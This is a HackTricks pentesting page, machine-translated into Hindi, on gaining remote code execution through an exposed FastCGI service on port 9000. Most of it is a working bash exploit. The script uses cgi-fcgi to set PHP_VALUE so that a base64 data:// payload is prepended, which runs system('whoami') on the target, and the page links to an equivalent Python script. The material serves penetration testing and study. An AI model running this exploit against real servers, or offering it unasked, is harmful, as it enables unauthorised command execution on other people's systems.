hacktricks/network-services-pentesting/9000-pentesting-fastcgi.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

6.2 KiB

☁️ HackTricks क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

मूलभूत जानकारी

यदि आप जानना चाहते हैं कि FastCGI क्या है, तो निम्नलिखित पृष्ठ की जांच करें:

{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %} disable_functions-bypass-php-fpm-fastcgi.md {% endcontent-ref %}

डिफ़ॉल्ट रूप से FastCGI पोर्ट 9000 में चलता है और nmap द्वारा मान्यता प्राप्त नहीं होता है। आमतौर पर FastCGI केवल localhost में सुनता है।

RCE

FastCGI को अनिवार्य कोड निष्पादित करना बहुत आसान है:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

या आप निम्नलिखित पायथन स्क्रिप्ट का उपयोग भी कर सकते हैं: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥